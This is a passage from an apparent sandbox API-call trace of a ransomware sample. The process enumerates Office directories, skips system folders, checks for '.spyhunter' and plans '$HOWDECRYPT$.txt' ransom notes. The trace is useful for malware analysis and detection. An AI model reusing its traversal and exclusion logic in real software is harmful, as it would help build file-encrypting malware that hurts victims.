lpString2="_uninstalling_.png") returned 1 [0088.020] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 110 [0088.020] GetProcessHeap () returned 0x2c0000 [0088.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11e) returned 0x375dc8 [0088.020] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb88) returned 0x37a750 [0088.020] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0088.020] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0088.020] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\$HOWDECRYPT$.txt") returned 117 [0088.020] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\$HOWDECRYPT$.txt") returned 117 [0088.020] GetProcessHeap () returned 0x2c0000 [0088.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x12c) returned 0x375ef0 [0088.020] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb90) returned 0x37a750 [0088.020] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0088.020] lstrcmpiW (lpString1="PRJPROR", lpString2="Windows") returned -1 [0088.020] lstrlenW (lpString="Windows") returned 7 [0088.020] lstrcmpiW (lpString1="PRJPROR", lpString2="$Recycle.bin") returned 1 [0088.021] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.021] lstrcmpiW (lpString1="PRJPROR", lpString2="System Volume Information") returned -1 [0088.021] lstrlenW (lpString="System Volume Information") returned 25 [0088.021] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR") returned 91 [0088.021] lstrcmpW (lpString1="PRJPROR", lpString2=".") returned 1 [0088.021] lstrcmpW (lpString1="PRJPROR", lpString2="..") returned 1 [0088.021] GetProcessHeap () returned 0x2c0000 [0088.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0088.021] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\*") returned 93 [0088.021] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0088.049] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0088.049] lstrlenW (lpString="Windows") returned 7 [0088.049] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0088.049] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.049] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0088.049] lstrlenW (lpString="System Volume Information") returned 25 [0088.049] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\.") returned 93 [0088.049] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.049] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.049] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0088.050] lstrlenW (lpString="Windows") returned 7 [0088.050] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0088.050] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.050] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0088.050] lstrlenW (lpString="System Volume Information") returned 25 [0088.050] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\..") returned 94 [0088.050] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.050] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.050] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.050] lstrcmpiW (lpString1="PrjProrWW.XML", lpString2="Windows") returned -1 [0088.050] lstrlenW (lpString="Windows") returned 7 [0088.050] lstrcmpiW (lpString1="PrjProrWW.XML", lpString2="$Recycle.bin") returned 1 [0088.050] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.050] lstrcmpiW (lpString1="PrjProrWW.XML", lpString2="System Volume Information") returned -1 [0088.050] lstrlenW (lpString="System Volume Information") returned 25 [0088.050] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 105 [0088.050] StrStrIW (lpFirst="PrjProrWW.XML", lpSrch=".spyhunter") returned 0x0 [0088.050] lstrcmpW (lpString1="PrjProrWW.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.050] lstrcmpW (lpString1="PrjProrWW.XML", lpString2="_uninstalling_.png") returned 1 [0088.050] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 105 [0088.050] GetProcessHeap () returned 0x2c0000 [0088.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x114) returned 0x353bb0 [0088.050] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb88) returned 0x37a750 [0088.051] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.051] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0088.051] lstrlenW (lpString="Windows") returned 7 [0088.051] lstrcmpiW (lpString1="SETUP.XML", lpString2="$Recycle.bin") returned 1 [0088.051] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.051] lstrcmpiW (lpString1="SETUP.XML", lpString2="System Volume Information") returned -1 [0088.051] lstrlenW (lpString="System Volume Information") returned 25 [0088.051] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 101 [0088.051] StrStrIW (lpFirst="SETUP.XML", lpSrch=".spyhunter") returned 0x0 [0088.051] lstrcmpW (lpString1="SETUP.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.051] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0088.051] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 101 [0088.051] GetProcessHeap () returned 0x2c0000 [0088.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x10c) returned 0x375ef0 [0088.051] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb90) returned 0x37a750 [0088.051] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0088.051] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0088.058] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\$HOWDECRYPT$.txt") returned 108 [0088.059] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\$HOWDECRYPT$.txt") returned 108 [0088.059] GetProcessHeap () returned 0x2c0000 [0088.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11a) returned 0x376008 [0088.059] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb98) returned 0x37a750 [0088.059] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0088.059] lstrcmpiW (lpString1="Project.en-us", lpString2="Windows") returned -1 [0088.059] lstrlenW (lpString="Windows") returned 7 [0088.059] lstrcmpiW (lpString1="Project.en-us", lpString2="$Recycle.bin") returned 1 [0088.059] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.059] lstrcmpiW (lpString1="Project.en-us", lpString2="System Volume Information") returned -1 [0088.059] lstrlenW (lpString="System Volume Information") returned 25 [0088.060] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us") returned 97 [0088.060] lstrcmpW (lpString1="Project.en-us", lpString2=".") returned 1 [0088.060] lstrcmpW (lpString1="Project.en-us", lpString2="..") returned 1 [0088.060] GetProcessHeap () returned 0x2c0000 [0088.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0088.060] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\*") returned 99 [0088.060] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0088.063] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0088.063] lstrlenW (lpString="Windows") returned 7 [0088.063] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0088.063] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.063] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0088.063] lstrlenW (lpString="System Volume Information") returned 25 [0088.063] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\.") returned 99 [0088.063] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.063] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.064] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0088.064] lstrlenW (lpString="Windows") returned 7 [0088.064] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0088.064] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.064] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0088.064] lstrlenW (lpString="System Volume Information") returned 25 [0088.064] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\..") returned 100 [0088.064] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.064] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.064] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.064] lstrcmpiW (lpString1="ProjectMUI.XML", lpString2="Windows") returned -1 [0088.064] lstrlenW (lpString="Windows") returned 7 [0088.064] lstrcmpiW (lpString1="ProjectMUI.XML", lpString2="$Recycle.bin") returned 1 [0088.064] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.064] lstrcmpiW (lpString1="ProjectMUI.XML", lpString2="System Volume Information") returned -1 [0088.064] lstrlenW (lpString="System Volume Information") returned 25 [0088.064] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 112 [0088.064] StrStrIW (lpFirst="ProjectMUI.XML", lpSrch=".spyhunter") returned 0x0 [0088.064] lstrcmpW (lpString1="ProjectMUI.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.064] lstrcmpW (lpString1="ProjectMUI.XML", lpString2="_uninstalling_.png") returned 1 [0088.064] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 112 [0088.064] GetProcessHeap () returned 0x2c0000 [0088.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x122) returned 0x376130 [0088.065] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xba0) returned 0x37a750 [0088.065] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.065] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0088.065] lstrlenW (lpString="Windows") returned 7 [0088.065] lstrcmpiW (lpString1="SETUP.XML", lpString2="$Recycle.bin") returned 1 [0088.065] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.065] lstrcmpiW (lpString1="SETUP.XML", lpString2="System Volume Information") returned -1 [0088.065] lstrlenW (lpString="System Volume Information") returned 25 [0088.065] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 107 [0088.065] StrStrIW (lpFirst="SETUP.XML", lpSrch=".spyhunter") returned 0x0 [0088.065] lstrcmpW (lpString1="SETUP.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.065] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0088.065] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 107 [0088.065] GetProcessHeap () returned 0x2c0000 [0088.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x118) returned 0x376260 [0088.065] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xba8) returned 0x37a750 [0088.065] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0088.065] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0088.066] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\$HOWDECRYPT$.txt") returned 114 [0088.066] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\$HOWDECRYPT$.txt") returned 114 [0088.066] GetProcessHeap () returned 0x2c0000 [0088.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x126) returned 0x376380 [0088.067] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xbb0) returned 0x37a750 [0088.067] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0088.067] lstrcmpiW (lpString1="Proof.en", lpString2="Windows") returned -1 [0088.067] lstrlenW (lpString="Windows") returned 7 [0088.067] lstrcmpiW (lpString1="Proof.en", lpString2="$Recycle.bin") returned 1 [0088.067] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.067] lstrcmpiW (lpString1="Proof.en", lpString2="System Volume Information") returned -1 [0088.067] lstrlenW (lpString="System Volume Information") returned 25 [0088.067] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en") returned 92 [0088.067] lstrcmpW (lpString1="Proof.en", lpString2=".") returned 1 [0088.067] lstrcmpW (lpString1="Proof.en", lpString2="..") returned 1 [0088.067] GetProcessHeap () returned 0x2c0000 [0088.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0088.067] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\*") returned 94 [0088.067] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0088.069] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0088.069] lstrlenW (lpString="Windows") returned 7 [0088.069] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0088.069] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.069] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0088.069] lstrlenW (lpString="System Volume Information") returned 25 [0088.069] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\.") returned 94 [0088.069] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.069] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.069] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0088.069] lstrlenW (lpString="Windows") returned 7 [0088.070] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0088.070] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.070] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0088.070] lstrlenW (lpString="System Volume Information") returned 25 [0088.070] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\..") returned 95 [0088.070] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.070] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.070] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.070] lstrcmpiW (lpString1="Proof.XML", lpString2="Windows") returned -1 [0088.070] lstrlenW (lpString="Windows") returned 7 [0088.070] lstrcmpiW (lpString1="Proof.XML", lpString2="$Recycle.bin") returned 1 [0088.070] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.070] lstrcmpiW (lpString1="Proof.XML", lpString2="System Volume Information") returned -1 [0088.070] lstrlenW (lpString="System Volume Information") returned 25 [0088.070] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 102 [0088.070] StrStrIW (lpFirst="Proof.XML", lpSrch=".spyhunter") returned 0x0 [0088.070] lstrcmpW (lpString1="Proof.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.070] lstrcmpW (lpString1="Proof.XML", lpString2="_uninstalling_.png") returned 1 [0088.070] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 102 [0088.070] GetProcessHeap () returned 0x2c0000 [0088.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x10e) returned 0x3764b0 [0088.070] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xbb8) returned 0x37a750 [0088.070] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0088.071] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0088.074] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\$HOWDECRYPT$.txt") returned 109 [0088.074] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\$HOWDECRYPT$.txt") returned 109 [0088.074] GetProcessHeap () returned 0x2c0000 [0088.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11c) returned 0x3765c8 [0088.075] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xbc0) returned 0x37a750 [0088.075] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0088.075] lstrcmpiW (lpString1="Proof.es", lpString2="Windows") returned -1 [0088.075] lstrlenW (lpString="Windows") returned 7 [0088.075] lstrcmpiW (lpString1="Proof.es", lpString2="$Recycle.bin") returned 1 [0088.075] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.075] lstrcmpiW (lpString1="Proof.es", lpString2="System Volume Information") returned -1 [0088.075] lstrlenW (lpString="System Volume Information") returned 25 [0088.075] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es") returned 92 [0088.076] lstrcmpW (lpString1="Proof.es", lpString2=".") returned 1 [0088.076] lstrcmpW (lpString1="Proof.es", lpString2="..") returned 1 [0088.076] GetProcessHeap () returned 0x2c0000 [0088.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0088.076] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\*") returned 94 [0088.076] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0088.077] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0088.077] lstrlenW (lpString="Windows") returned 7 [0088.077] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0088.077] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.077] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0088.077] lstrlenW (lpString="System Volume Information") returned 25 [0088.077] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\.") returned 94 [0088.077] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.077] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.078] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0088.078] lstrlenW (lpString="Windows") returned 7 [0088.078] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0088.078] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.078] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0088.078] lstrlenW (lpString="System Volume Information") returned 25 [0088.078] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\..") returned 95 [0088.078] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.078] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.078] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0088.079] lstrcmpiW (lpString1="Proof.XML", lpString2="Windows") returned -1 [0088.079] lstrlenW (lpString="Windows") returned 7 [0088.079] lstrcmpiW (lpString1="Proof.XML", lpString2="$Recycle.bin") returned 1 [0088.079] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.079] lstrcmpiW (lpString1="Proof.XML", lpString2="System Volume Information") returned -1 [0088.079] lstrlenW (lpString="System Volume Information") returned 25 [0088.079] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 102 [0088.079] StrStrIW (lpFirst="Proof.XML", lpSrch=".spyhunter") returned 0x0 [0088.079] lstrcmpW (lpString1="Proof.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.079] lstrcmpW (lpString1="Proof.XML", lpString2="_uninstalling_.png") returned 1 [0088.079] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 102 [0088.079] GetProcessHeap () returned 0x2c0000 [0088.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x10e) returned 0x3766f0 [0088.079] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xbc8) returned 0x37a750 [0088.079] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0088.080] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0088.081] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\$HOWDECRYPT$.txt") returned 109 [0088.081] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\$HOWDECRYPT$.txt") returned 109 [0088.081] GetProcessHeap () returned 0x2c0000 [0088.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11c) returned 0x379178 [0088.081] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xbd0) returned 0x37a750 [0088.081] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0088.081] lstrcmpiW (lpString1="Proof.fr", lpString2="Windows") returned -1 [0088.081] lstrlenW (lpString="Windows") returned 7 [0088.081] lstrcmpiW (lpString1="Proof.fr", lpString2="$Recycle.bin") returned 1 [0088.081] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.081] lstrcmpiW (lpString1="Proof.fr", lpString2="System Volume Information") returned -1 [0088.081] lstrlenW (lpString="System Volume Information") returned 25 [0088.081] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr") returned 92 [0088.082] lstrcmpW (lpString1="Proof.fr", lpString2=".") returned 1 [0088.082] lstrcmpW (lpString1="Proof.fr", lpString2="..") returned 1 [0088.082] GetProcessHeap () returned 0x2c0000 [0088.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0088.082] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\*") returned 94 [0088.082] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0088.084] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0088.085] lstrlenW (lpString="Windows") returned 7 [0088.085] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0088.085] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.085] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0088.085] lstrlenW (lpString="System Volume Information") returned 